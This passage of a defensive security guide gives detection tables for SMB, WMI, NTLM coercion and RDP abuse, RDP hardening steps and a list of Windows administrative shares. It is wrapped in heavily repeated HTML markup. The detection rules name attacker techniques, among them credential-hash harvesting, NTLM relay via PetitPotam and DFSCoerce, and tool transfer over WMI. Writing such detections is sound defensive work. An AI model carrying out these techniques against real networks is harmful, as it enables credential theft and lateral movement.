hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">High Volume of SMB Connections</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1021/002/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1021.002 – SMB/Windows Admin Shares</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for a sharp increase in SMB connections that fall outside of a normal pattern.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Outbound Connection Attempted Over SMB</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1212/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1212 – Exploitation for Credential Access</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for external connection attempts over SMB, as this may be an attempt to harvest credential hashes.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">WMI Being Used to Call a Remote Service</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1047/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1047 – Windows Management Instrumentation</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for WMI being used via a command line or PowerShell to call a remote service for execution.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">WMI Being Used for Ingress Tool Transfer</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1105/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1105 – Ingress Tool Transfer</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for suspicious usage of WMI to download external resources. </span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Forced NTLM Authentication Using SMB or WebDAV</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1187/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1187 – Forced Authentication</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for potential NTLM authentication attempts using SMB or WebDAV.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">NTLM Relay via Coercion</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="text-decoration: underline; vertical-align: baseline;">T1187 - Forced Authentication</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor for NTLM authentication attempts from Domain Controllers or privileged servers to unexpected destinations, particularly to HTTP endpoints (AD CS web enrollment). </span></p> <p><span style="vertical-align: baseline;">Detect PetitPotam by monitoring for EfsRpcOpenFileRaw calls, DFSCoerce via DFS-related named pipe access, and PrinterBug via SpoolService RPC calls.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 13: Detection opportunities for SMB, WMI, and NTLM communications</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Remote Desktop Protocol Hardening</span></h4> <p><span style="vertical-align: baseline;">Remote Desktop Protocol (RDP) is a common method used by threat actors to remotely connect to systems, laterally move from the perimeter onto a larger scope of internal systems, and perform malicious activities (such as data theft or ransomware deployment). External-facing systems with RDP open to the internet present an elevated risk. Threat actors may exploit this vector to gain initial access to an organization and then perform lateral movement into the organization to complete their mission objectives.</span></p> <p><span style="vertical-align: baseline;">Proactively, organizations should scan their public IP address ranges to identify systems with RDP (TCP/3389) and other protocols (SMB – TCP/445) open to the internet. At a minimum, RDP and SMB should not be directly exposed for ingress and egress access to/from the internet. If required for operational purposes, explicit controls should be implemented to restrict the source IP addresses, which can interface with systems using these protocols. The following hardening recommendations should also be implemented.</span></p> <h5><span style="vertical-align: baseline;">Enforce Multi-Factor Authentication</span></h5> <p><span style="vertical-align: baseline;">If external-facing RDP must be used for operational purposes, MFA should be enforced when connecting using this method. This can be accomplished either via the integration of a third-party MFA technology or by leveraging a Remote Desktop Gateway and Azure Multifactor Authentication Server using Remote Authentication Dial-In User Service (<a href="https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfaserver-nps-rdg" rel="noopener" target="_blank">RADIUS</a>)</span><span style="vertical-align: baseline;">.</span></p> <h5><span style="vertical-align: baseline;">Leverage Network-Level Authentication</span></h5> <p><span style="vertical-align: baseline;">For external-facing RDP servers, Network-Level Authentication (NLA) provides an extra layer of preauthentication before a connection is established. NLA can also be useful for protecting against brute-force attacks, which often target open internet-facing RDP servers.</span></p> <p><span style="vertical-align: baseline;">NLA can be configured either via the user interface (UI) (Figure 10) or via Group Policy (Figure 11).</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--medium h-c-grid__col h-c-grid__col--4 h-c-grid__col--offset-4 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig10.max-1000x1000.png" alt="Enabling NLA via the UI"> </a> <figcaption class="article-image__caption "><p data-block-key="bx1dm">Figure 10: Enabling NLA via the UI</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Using a GPO, the setting for NLA can be configured via:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Administrative Templates &gt; Windows Components &gt; Remote Desktop Services &gt; Remote Desktop Session Host &gt; Security &gt; Require user authentication for remote connections by using Network Level Authentication</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Enabled</span></p> </li> </ul> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig11.max-1000x1000.png" alt="Enabling NLA via Group Policy"> </a> <figcaption class="article-image__caption "><p data-block-key="bx1dm">Figure 11: Enabling NLA via Group Policy</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Some caveats about leveraging NLA for RDP:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The Remote Desktop client v7.0 (or greater) must be leveraged.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">NLA uses CredSSP to pass authentication requests on the initiating system. CredSSP stores credentials in Local Security Authority (LSA) memory on the initiating system, and these credentials may remain in memory even after a user logs off the system. This provides a potential exposure risk for credentials in memory on the source system.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">On the RDP server, users permitted for remote access using RDP must be assigned the </span><span style="font-style: italic; vertical-align: baseline;">Access this computer from the network</span><span style="vertical-align: baseline;"> privilege when NLA is enforced. </span><strong style="vertical-align: baseline;">This privilege is often explicitly denied for user accounts to protect against lateral movement techniques.</strong></p> </li> </ul> <h5><span style="vertical-align: baseline;">Restrict Administrative Accounts from Leveraging RDP on Internet-Facing Systems</span></h5> <p><span style="vertical-align: baseline;">For external-facing RDP servers, highly privileged domain and local administrative accounts should not be permitted access to authenticate with the external-facing systems using RDP (Figure 12). </span></p> <p><span style="vertical-align: baseline;">This can be enforced using Group Policy, configurable via the following path: </span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment &gt; Deny log on through Terminal Services</span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig12.max-1000x1000.png" alt="Group Policy configuration for restricting highly privileged domain and local administrative accounts from leveraging RDP"> </a> <figcaption class="article-image__caption "><p data-block-key="ro2xo">Figure 12: Group Policy configuration for restricting highly privileged domain and local administrative accounts from leveraging RDP</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Detection Opportunities for RDP Usage</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">RDP Authentication Integration </span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1110/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1110 – Brute Force</span></a></p> <p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1078 – Valid Accounts</span></a></p> <p><a href="https://attack.mitre.org/techniques/T1021/001/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1021.001 – Remote Desktop Protocol</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Existing authentication rules should include RDP attempts. This includes use cases for:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Brute Force</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Password Spraying</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">MFA Failures Single User</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">MFA Failures Single Source</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">External Authentication from an Account with Elevated Privileges</span></p> </li> </ul> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Anomalous Connection Attempts over RDP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1078 – Valid Accounts</span></a></p> <p><a href="https://attack.mitre.org/techniques/T1021/001/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1021.001 – Remote Desktop Protocol</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Searching for anomalous RDP connection attempts over known RDP ports such as TCP/3389.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 14: Detection Opportunities for RDP Usage</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Disabling Administrative/Hidden Shares</span></h4> <p><span style="vertical-align: baseline;">To conduct lateral movement, threat actors may attempt to identify administrative or hidden network shares, including those that are not explicitly mapped to a drive letter and use these for remotely binding to endpoints throughout an environment. As a protective or rapid containment measure, organizations may need to quickly disable default administrative or hidden shares from being accessible on endpoints. This can be accomplished by either modifying the registry, stopping a service, or by using the <a href="https://www.microsoft.com/en-us/download/details.aspx?id=55319" rel="noopener" target="_blank">MSS (Legacy) Group Policy template</a></span><span style="vertical-align: baseline;">.</span></p> <p><span style="vertical-align: baseline;">Common administrative and hidden shares on endpoints include:</span></p> <ul> <li role="presentation"><code style="vertical-align: baseline;">ADMIN$</code></li> <li role="presentation"><code style="vertical-align: baseline;">C$</code></li> <li role="presentation"><code style="vertical-align: baseline;">D$</code></li> <li role="presentation"><code style="vertical-align: baseline;">IPC$</code></li> </ul></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; 